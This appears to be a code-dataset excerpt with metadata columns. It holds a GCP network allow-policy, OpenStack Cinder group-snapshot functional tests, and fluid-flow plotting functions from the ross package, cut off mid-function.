[
"MIT"
] | null | null | null |
def moge():
pass
| 7
| 11
| 0.52381
| 3
| 21
| 3.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 21
| 2
| 12
| 10.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
76d7c3f608d2084a043657a2da73e41bbc18e997
| 136
|
py
|
Python
|
models/remote/login.py
|
anthill-gaming/anthill-admin
|
e3c29a9bd7c04d2c6ce29528578a93395adf59e0
|
[
"MIT"
] | 1
|
2018-11-30T21:56:14.000Z
|
2018-11-30T21:56:14.000Z
|
models/remote/login.py
|
anthill-gaming/anthill-admin
|
e3c29a9bd7c04d2c6ce29528578a93395adf59e0
|
[
"MIT"
] | null | null | null |
models/remote/login.py
|
anthill-gaming/anthill-admin
|
e3c29a9bd7c04d2c6ce29528578a93395adf59e0
|
[
"MIT"
] | null | null | null |
from anthill.platform.remote_models import remote_model_factory
from anthill.platform.auth import RemoteUser
__all__ = ['RemoteUser']
| 22.666667
| 63
| 0.838235
| 17
| 136
| 6.294118
| 0.647059
| 0.205607
| 0.35514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095588
| 136
| 5
| 64
| 27.2
| 0.869919
| 0
| 0
| 0
| 0
| 0
| 0.073529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
76dced3b1f3c1e96596eb60b486bfc9c7c957be6
| 3,715
|
py
|
Python
|
python/meta_policy_gcp.py
|
SidharthAnand/api
|
99d4b614b1535590a79a4a839fd31dd28a3524c3
|
[
"MIT"
] | 4
|
2021-01-24T01:33:13.000Z
|
2022-03-19T12:57:50.000Z
|
python/meta_policy_gcp.py
|
SidharthAnand/api
|
99d4b614b1535590a79a4a839fd31dd28a3524c3
|
[
"MIT"
] | 4
|
2021-03-16T16:36:12.000Z
|
2021-06-26T16:40:47.000Z
|
python/meta_policy_gcp.py
|
SidharthAnand/api
|
99d4b614b1535590a79a4a839fd31dd28a3524c3
|
[
"MIT"
] | 7
|
2021-01-07T15:53:51.000Z
|
2021-06-21T18:17:00.000Z
|
import api
class MpGCP:
policies = [
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("process", "dockerd", who="client"),
api.f.endpoint("dns_pattern", ":storage.googleapis.com:", who="server"),
], changes=[
("server", "dns_pattern", ".*:storage\.googleapis\.com:.*"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("process", "/google-cloud-sdk/lib/gcloud.py", who="client"),
api.f.endpoint("dns_pattern", ":.*.googleapis.com:", who="server"),
], changes=[
("server", "dns_pattern", ":.*\.googleapis\.com:"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("process", ["signalfx-agent", "/usr/bin/google_accounts_daemon", "/usr/bin/google_clock_skew_daemon", "/usr/bin/google_network_daemon", "/usr/bin/google_metadata_script_runner"], who="client"),
api.f.endpoint("subnet", "169.254.169.254", who="server"),
api.f.endpoint("netmask", 32, who="server"),
api.f.endpoint("dst_port", 80, who="server"),
], changes=[
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("process", "google-cloud-sdk/lib/gcloud.py", who="client"),
api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
], changes=[
("server", "dns_pattern", ":metadata\.google\.internal:"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("app", ".*.istio-proxy"),
api.f.endpoint("process", "pilot-agent", who="client"),
api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
], changes=[
("server", "dns_pattern", ":metadata\.google\.internal:"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("app", "linux"),
api.f.endpoint("process", "/usr/bin/google_", who="client"),
api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
], changes=[
("server", "dns_pattern", ":metadata\.google\.internal:"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("binary_name", "kubernetes/bin/node-problem-detector", who="client"),
api.f.endpoint("dns_pattern", ":.*.googleapis.com:", who="server"),
], changes=[
("server", "dns_pattern", ":.*\.googleapis\.com:"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("app", "kube-system\."),
api.f.endpoint("process", "external-dns", who="client"),
api.f.endpoint("dns_pattern", ":.*.googleapis.com:", who="server"),
], changes=[
("server", "dns_pattern", ":.*\.googleapis\.com:"),
]),
api.AcceptLink(filters=[
api.f.type("NAE"),
api.f.endpoint("app", "kube-system.*.external-dns"),
api.f.endpoint("process", "external-dns", who="client"),
api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
], changes=[
("server", "dns_pattern", ":metadata\.google\.internal:"),
]),
]
print("Adding meta-policies to runner")
api.mpr.add(MpGCP)
| 48.246753
| 224
| 0.492328
| 365
| 3,715
| 4.931507
| 0.189041
| 0.073333
| 0.16
| 0.115
| 0.787778
| 0.745
| 0.745
| 0.727778
| 0.702778
| 0.702778
| 0
| 0.006233
| 0.309018
| 3,715
| 76
| 225
| 48.881579
| 0.694975
| 0
| 0
| 0.702703
| 0
| 0
| 0.340511
| 0.158277
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013514
| 0
| 0.040541
| 0.013514
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76e98f68c33e7c073dab79f010c102d8ef3dcde1
| 15,214
|
py
|
Python
|
cinder/tests/functional/test_group_snapshots.py
|
ilay09/cinder
|
86f084d42f18bd5971cc7a0df3e6d815543a472d
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/functional/test_group_snapshots.py
|
ilay09/cinder
|
86f084d42f18bd5971cc7a0df3e6d815543a472d
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/functional/test_group_snapshots.py
|
ilay09/cinder
|
86f084d42f18bd5971cc7a0df3e6d815543a472d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 EMC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.tests.functional import functional_helpers
class GroupSnapshotsTest(functional_helpers._FunctionalTestBase):
_vol_type_name = 'functional_test_type'
_grp_type_name = 'functional_grp_test_type'
osapi_version_major = '3'
osapi_version_minor = '19'
def setUp(self):
super(GroupSnapshotsTest, self).setUp()
self.volume_type = self.api.create_type(self._vol_type_name)
self.group_type = self.api.create_group_type(self._grp_type_name)
def _get_flags(self):
f = super(GroupSnapshotsTest, self)._get_flags()
f['volume_driver'] = (
'cinder.tests.fake_driver.FakeLoggingVolumeDriver')
f['default_volume_type'] = self._vol_type_name
f['default_group_type'] = self._grp_type_name
return f
def test_get_group_snapshots_summary(self):
"""Simple check that listing group snapshots works."""
grp_snaps = self.api.get_group_snapshots(False)
self.assertIsNotNone(grp_snaps)
def test_get_group_snapshots(self):
"""Simple check that listing group snapshots works."""
grp_snaps = self.api.get_group_snapshots()
self.assertIsNotNone(grp_snaps)
def test_create_and_delete_group_snapshot(self):
"""Creates and deletes a group snapshot."""
# Create group
created_group = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(created_group['id'])
created_group_id = created_group['id']
# Check it's there
found_group = self._poll_group_while(created_group_id,
['creating'])
self.assertEqual(created_group_id, found_group['id'])
self.assertEqual(self.group_type['id'], found_group['group_type'])
self.assertEqual('available', found_group['status'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': created_group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
self.assertEqual(created_group_id, found_volume['group_id'])
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Create group snapshot
created_group_snapshot = self.api.post_group_snapshot(
{'group_snapshot': {'group_id': created_group_id}})
self.assertTrue(created_group_snapshot['id'])
created_group_snapshot_id = created_group_snapshot['id']
# Check it's there
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['creating'])
self.assertEqual(created_group_snapshot_id, found_group_snapshot['id'])
self.assertEqual(created_group_id,
found_group_snapshot['group_id'])
self.assertEqual('available', found_group_snapshot['status'])
# Delete the group snapshot
self.api.delete_group_snapshot(created_group_snapshot_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['deleting'])
# Delete the original group
self.api.delete_group(created_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(created_group_id, ['deleting'])
# Should be gone
self.assertFalse(found_group_snapshot)
self.assertFalse(found_volume)
self.assertFalse(found_group)
def test_create_group_from_group_snapshot(self):
"""Creates a group from a group snapshot."""
# Create group
created_group = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(created_group['id'])
created_group_id = created_group['id']
# Check it's there
found_group = self._poll_group_while(created_group_id,
['creating'])
self.assertEqual(created_group_id, found_group['id'])
self.assertEqual(self.group_type['id'], found_group['group_type'])
self.assertEqual('available', found_group['status'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': created_group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
self.assertEqual(created_group_id, found_volume['group_id'])
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Create group snapshot
created_group_snapshot = self.api.post_group_snapshot(
{'group_snapshot': {'group_id': created_group_id}})
self.assertTrue(created_group_snapshot['id'])
created_group_snapshot_id = created_group_snapshot['id']
# Check it's there
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['creating'])
self.assertEqual(created_group_snapshot_id, found_group_snapshot['id'])
self.assertEqual(created_group_id,
found_group_snapshot['group_id'])
self.assertEqual('available', found_group_snapshot['status'])
# Create group from group snapshot
created_group_from_snap = self.api.post_group_from_src(
{'create-from-src': {
'group_snapshot_id': created_group_snapshot_id}})
self.assertTrue(created_group_from_snap['id'])
created_group_from_snap_id = created_group_from_snap['id']
# Check it's there
found_volumes = self.api.get_volumes()
self._poll_volume_while(found_volumes[0], ['creating'])
self._poll_volume_while(found_volumes[1], ['creating'])
found_group_from_snap = self._poll_group_while(
created_group_from_snap_id, ['creating'])
self.assertEqual(created_group_from_snap_id,
found_group_from_snap['id'])
self.assertEqual(created_group_snapshot_id,
found_group_from_snap['group_snapshot_id'])
self.assertEqual(self.group_type['id'],
found_group_from_snap['group_type'])
self.assertEqual('available', found_group_from_snap['status'])
# Delete the group from snap
self.api.delete_group(created_group_from_snap_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_from_snap = self._poll_group_while(
created_group_from_snap_id, ['deleting'])
# Delete the group snapshot
self.api.delete_group_snapshot(created_group_snapshot_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['deleting'])
# Delete the original group
self.api.delete_group(created_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(created_group_id, ['deleting'])
# Should be gone
self.assertFalse(found_group_from_snap)
self.assertFalse(found_group_snapshot)
self.assertFalse(found_volume)
self.assertFalse(found_group)
def test_create_group_from_source_group(self):
"""Creates a group from a source group."""
# Create group
created_group = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(created_group['id'])
created_group_id = created_group['id']
# Check it's there
found_group = self._poll_group_while(created_group_id,
['creating'])
self.assertEqual(created_group_id, found_group['id'])
self.assertEqual(self.group_type['id'], found_group['group_type'])
self.assertEqual('available', found_group['status'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': created_group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
self.assertEqual(created_group_id, found_volume['group_id'])
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Test create group from source group
created_group_from_group = self.api.post_group_from_src(
{'create-from-src': {
'source_group_id': created_group_id}})
self.assertTrue(created_group_from_group['id'])
created_group_from_group_id = created_group_from_group['id']
# Check it's there
found_volumes = self.api.get_volumes()
self._poll_volume_while(found_volumes[0], ['creating'])
self._poll_volume_while(found_volumes[1], ['creating'])
found_group_from_group = self._poll_group_while(
created_group_from_group_id, ['creating'])
self.assertEqual(created_group_from_group_id,
found_group_from_group['id'])
self.assertEqual(created_group_id,
found_group_from_group['source_group_id'])
self.assertEqual(self.group_type['id'],
found_group_from_group['group_type'])
self.assertEqual('available', found_group_from_group['status'])
# Delete the group from group
self.api.delete_group(created_group_from_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_from_group = self._poll_group_while(
created_group_from_group_id, ['deleting'])
# Delete the original group
self.api.delete_group(created_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(created_group_id, ['deleting'])
# Should be gone
self.assertFalse(found_group_from_group)
self.assertFalse(found_volume)
self.assertFalse(found_group)
def test_reset_group_snapshot(self):
# Create group
group1 = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(group1['id'])
group_id = group1['id']
self._poll_group_while(group_id, ['creating'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
self._poll_volume_while(created_volume_id, ['creating'])
# Create group snapshot
group_snapshot1 = self.api.post_group_snapshot(
{'group_snapshot': {'group_id': group_id}})
self.assertTrue(group_snapshot1['id'])
group_snapshot_id = group_snapshot1['id']
self._poll_group_snapshot_while(group_snapshot_id, 'creating')
group_snapshot1 = self.api.get_group_snapshot(group_snapshot_id)
self.assertEqual("available", group_snapshot1['status'])
# reset group snapshot status
self.api.reset_group_snapshot(group_snapshot_id,
{"reset_status": {"status": "error"}})
group_snapshot1 = self.api.get_group_snapshot(group_snapshot_id)
self.assertEqual("error", group_snapshot1['status'])
# Delete group, volume and group snapshot
self.api.delete_group_snapshot(group_snapshot_id)
found_group_snapshot = self._poll_group_snapshot_while(
group_snapshot_id, ['deleting'])
self.api.delete_group(group_id,
{'delete': {'delete-volumes': True}})
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(group_id, ['deleting'])
# Created resources should be gone
self.assertFalse(found_group_snapshot)
self.assertFalse(found_volume)
self.assertFalse(found_group)
| 43.593123
| 79
| 0.645524
| 1,804
| 15,214
| 5.08204
| 0.086475
| 0.102094
| 0.050393
| 0.038394
| 0.850894
| 0.820244
| 0.782832
| 0.758072
| 0.722186
| 0.705716
| 0
| 0.002542
| 0.250033
| 15,214
| 348
| 80
| 43.718391
| 0.800964
| 0.150256
| 0
| 0.672811
| 0
| 0
| 0.10257
| 0.005607
| 0
| 0
| 0
| 0
| 0.299539
| 1
| 0.036866
| false
| 0
| 0.004608
| 0
| 0.069124
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76fe0d6b3d5fa70da953e254c70cafcb0e9d737d
| 16,551
|
py
|
Python
|
ross/fluid_flow/fluid_flow_graphics.py
|
flaviorangel/test-joss-paper
|
480eae9c685ed3d96e9c5971d0b9ea1356eaf7d9
|
[
"MIT"
] | null | null | null |
ross/fluid_flow/fluid_flow_graphics.py
|
flaviorangel/test-joss-paper
|
480eae9c685ed3d96e9c5971d0b9ea1356eaf7d9
|
[
"MIT"
] | null | null | null |
ross/fluid_flow/fluid_flow_graphics.py
|
flaviorangel/test-joss-paper
|
480eae9c685ed3d96e9c5971d0b9ea1356eaf7d9
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from bokeh.plotting import figure
import numpy as np
def plot_eccentricity(fluid_flow_object, z=0):
"""This function assembles pressure graphic along the z-axis.
The first few plots are of a different color to indicate where theta begins.
Parameters
----------
fluid_flow_object: a FluidFlow object
z: int, optional
The distance in z where to cut and plot.
Returns
-------
Figure
An object containing the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> fig = plot_eccentricity(my_fluid_flow, z=int(my_fluid_flow.nz/2))
>>> # to show the plots you can use:
>>> # show(fig)
"""
p = figure(
title="Cut in plane Z=" + str(z),
x_axis_label="X axis",
y_axis_label="Y axis",
)
for j in range(0, fluid_flow_object.ntheta):
p.circle(fluid_flow_object.xre[z][j], fluid_flow_object.yre[z][j], color="red")
p.circle(fluid_flow_object.xri[z][j], fluid_flow_object.yri[z][j], color="blue")
p.circle(0, 0, color="blue")
p.circle(fluid_flow_object.xi, fluid_flow_object.yi, color="red")
p.circle(0, 0, color="black")
return p
def plot_pressure_z(fluid_flow_object, theta=0):
"""This function assembles pressure graphic along the z-axis for one or both the
numerically (blue) and analytically (red) calculated pressure matrices, depending on if
one or both were calculated.
Parameters
----------
fluid_flow_object: a FluidFlow object
theta: int, optional
The theta to be considered.
Returns
-------
Figure
An object containing the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
array([[...
>>> fig = plot_pressure_z(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
>>> # to show the plots you can use:
>>> # show(fig)
"""
if (
not fluid_flow_object.numerical_pressure_matrix_available
and not fluid_flow_object.analytical_pressure_matrix_available
):
raise ValueError(
"Must calculate the pressure matrix. "
"Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
)
y_n = []
y_a = []
for i in range(0, fluid_flow_object.nz):
y_n.append(fluid_flow_object.p_mat_numerical[i][theta])
y_a.append(fluid_flow_object.p_mat_analytical[i][theta])
p = figure(
title="Pressure along the Z direction (direction of flow); Theta="
+ str(theta),
x_axis_label="Points along Z",
)
if fluid_flow_object.numerical_pressure_matrix_available:
p.line(fluid_flow_object.z_list, y_n, legend="Numerical pressure", color="blue", line_width=2)
if fluid_flow_object.analytical_pressure_matrix_available:
p.line(fluid_flow_object.z_list, y_a, legend="Analytical pressure", color="red", line_width=2)
return p
def plot_shape(fluid_flow_object, theta=0):
"""This function assembles a graphic representing the geometry of the rotor.
Parameters
----------
fluid_flow_object: a FluidFlow object
theta: int, optional
The theta to be considered.
Returns
-------
Figure
An object containing the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> fig = plot_shape(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
>>> # to show the plots you can use:
>>> # show(fig)
"""
y_re = np.zeros(fluid_flow_object.nz)
y_ri = np.zeros(fluid_flow_object.nz)
for i in range(0, fluid_flow_object.nz):
y_re[i] = fluid_flow_object.re[i][theta]
y_ri[i] = fluid_flow_object.ri[i][theta]
p = figure(
title="Shapes of stator and rotor along Z; Theta=" + str(theta),
x_axis_label="Points along Z",
y_axis_label="Radial direction",
)
p.line(fluid_flow_object.z_list, y_re, line_width=2, color="red")
p.line(fluid_flow_object.z_list, y_ri, line_width=2, color="blue")
return p
def plot_pressure_theta(fluid_flow_object, z=0):
"""This function assembles pressure graphic in the theta direction for a given z
for one or both the numerically (blue) and analytically (red) calculated pressure matrices,
depending on if one or both were calculated.
Parameters
----------
fluid_flow_object: a FluidFlow object
z: int, optional
The distance along z-axis to be considered.
Returns
-------
Figure
An object containing the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
array([[...
>>> fig = plot_pressure_theta(my_fluid_flow, z=int(my_fluid_flow.nz/2))
>>> # to show the plots you can use:
>>> # show(fig)
"""
if (
not fluid_flow_object.numerical_pressure_matrix_available
and not fluid_flow_object.analytical_pressure_matrix_available
):
raise ValueError(
"Must calculate the pressure matrix. "
"Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
)
p = figure(
title="Pressure along Theta; Z=" + str(z),
x_axis_label="Points along Theta",
y_axis_label="Pressure",
)
if fluid_flow_object.numerical_pressure_matrix_available:
p.line(
fluid_flow_object.gama[z],
fluid_flow_object.p_mat_numerical[z],
legend="Numerical pressure",
line_width=2,
color="blue",
)
elif fluid_flow_object.analytical_pressure_matrix_available:
p.line(
fluid_flow_object.gama[z],
fluid_flow_object.p_mat_analytical[z],
legend="Analytical pressure",
line_width=2,
color="red",
)
return p
def matplot_eccentricity(fluid_flow_object, z=0, ax=None):
"""This function assembles pressure graphic along the z-axis using matplotlib.
The first few plots are of a different color to indicate where theta begins.
Parameters
----------
fluid_flow_object: a FluidFlow object
z: int, optional
The distance in z where to cut and plot.
ax : matplotlib axes, optional
Axes in which the plot will be drawn.
Returns
-------
ax : matplotlib axes
Returns the axes object with the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> fig, ax = plt.subplots()
>>> ax = matplot_eccentricity(my_fluid_flow, z=int(my_fluid_flow.nz/2), ax=ax)
>>> # to show the plots you can use:
>>> # plt.show()
"""
if ax is None:
ax = plt.gca()
x_r = []
x_b = []
y_r = []
y_b = []
for j in range(0, fluid_flow_object.ntheta):
x_r.append(fluid_flow_object.xre[z][j])
y_r.append(fluid_flow_object.yre[z][j])
x_b.append(fluid_flow_object.xri[z][j])
y_b.append(fluid_flow_object.yri[z][j])
ax.plot(x_r, y_r, "r.")
ax.plot(x_b, y_b, "b.")
ax.plot(0, 0, "r*")
ax.plot(fluid_flow_object.xi, fluid_flow_object.yi, "b*")
ax.set_title("Cut in plane Z=" + str(z))
ax.set_xlabel("X axis")
ax.set_ylabel("Y axis")
plt.axis("equal")
return ax
def matplot_pressure_z(fluid_flow_object, theta=0, ax=None):
"""This function assembles pressure graphic along the z-axis using matplotlib
for one or both the numerically (blue) and analytically (red) calculated pressure matrices,
depending on if one or both were calculated.
Parameters
----------
fluid_flow_object: a FluidFlow object
theta: int, optional
The distance in theta where to cut and plot.
ax : matplotlib axes, optional
Axes in which the plot will be drawn.
Returns
-------
ax : matplotlib axes
Returns the axes object with the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
array([[...
>>> ax = matplot_pressure_z(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
>>> # to show the plots you can use:
>>> # plt.show()
"""
if (
not fluid_flow_object.numerical_pressure_matrix_available
and not fluid_flow_object.analytical_pressure_matrix_available
):
raise ValueError(
"Must calculate the pressure matrix. "
"Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
)
if ax is None:
ax = plt.gca()
y_n = np.zeros(fluid_flow_object.nz)
y_a = np.zeros(fluid_flow_object.nz)
for i in range(0, fluid_flow_object.nz):
y_n[i] = fluid_flow_object.p_mat_numerical[i][theta]
y_a[i] = fluid_flow_object.p_mat_analytical[i][theta]
if fluid_flow_object.numerical_pressure_matrix_available:
ax.plot(fluid_flow_object.z_list, y_n, "b", label="Numerical pressure")
if fluid_flow_object.analytical_pressure_matrix_available:
ax.plot(fluid_flow_object.z_list, y_a, "r", label="Analytical pressure")
ax.set_title(
"Pressure along the Z direction (direction of flow); Theta=" + str(theta)
)
ax.set_xlabel("Points along Z")
ax.set_ylabel("Pressure")
return ax
def matplot_shape(fluid_flow_object, theta=0, ax=None):
"""This function assembles a graphic representing the geometry of the rotor using matplotlib.
Parameters
----------
fluid_flow_object: a FluidFlow object
theta: int, optional
The theta to be considered.
ax : matplotlib axes, optional
Axes in which the plot will be drawn.
Returns
-------
ax : matplotlib axes
Returns the axes object with the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> ax = matplot_shape(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
>>> # to show the plots you can use:
>>> # plt.show()
"""
if ax is None:
ax = plt.gca()
y_ext = np.zeros(fluid_flow_object.nz)
y_int = np.zeros(fluid_flow_object.nz)
for i in range(0, fluid_flow_object.nz):
y_ext[i] = fluid_flow_object.re[i][theta]
y_int[i] = fluid_flow_object.ri[i][theta]
ax.plot(fluid_flow_object.z_list, y_ext, "r")
ax.plot(fluid_flow_object.z_list, y_int, "b")
ax.set_title("Shapes of stator and rotor along Z; Theta=" + str(theta))
ax.set_xlabel("Points along Z")
ax.set_ylabel("Radial direction")
return ax
def matplot_pressure_theta_cylindrical(fluid_flow_object, z=0, from_numerical=True, ax=None):
"""This function assembles cylindrical pressure graphic in the theta direction for a given z,
using matplotlib.
Parameters
----------
fluid_flow_object: a FluidFlow object
z: int, optional
The distance along z-axis to be considered.
from_numerical: bool, optional
If True, takes the numerically calculated pressure matrix as entry.
If False, takes the analytically calculated one instead.
If condition cannot be satisfied (matrix not calculated), it will take the one that is available
and raise a warning.
ax : matplotlib axes, optional
Axes in which the plot will be drawn.
Returns
-------
ax : matplotlib axes
Returns the axes object with the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
array([[...
>>> ax = matplot_pressure_theta_cylindrical(my_fluid_flow, z=int(my_fluid_flow.nz/2))
>>> # to show the plots you can use:
>>> # plt.show()
"""
if (
not fluid_flow_object.numerical_pressure_matrix_available
and not fluid_flow_object.analytical_pressure_matrix_available
):
raise ValueError(
"Must calculate the pressure matrix. "
"Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
)
if from_numerical:
if fluid_flow_object.numerical_pressure_matrix_available:
p_mat = fluid_flow_object.p_mat_numerical
else:
p_mat = fluid_flow_object.p_mat_analytical
else:
if fluid_flow_object.analytical_pressure_matrix_available:
p_mat = fluid_flow_object.p_mat_analytical
else:
p_mat = fluid_flow_object.p_mat_numerical
if ax is None:
fig, ax = plt.subplots(subplot_kw=dict(projection="polar"))
r = np.arange(
0,
fluid_flow_object.radius_stator + 0.0001,
(fluid_flow_object.radius_stator - fluid_flow_object.radius_rotor) / fluid_flow_object.nradius,
)
theta = np.arange(-np.pi * 0.25, 1.75 * np.pi + fluid_flow_object.dtheta / 2, fluid_flow_object.dtheta)
pressure_along_theta = np.zeros(fluid_flow_object.ntheta)
for i in range(0, fluid_flow_object.ntheta):
pressure_along_theta[i] = p_mat[0][i]
min_pressure = np.amin(pressure_along_theta)
r_matrix, theta_matrix = np.meshgrid(r, theta)
z_matrix = np.zeros((theta.size, r.size))
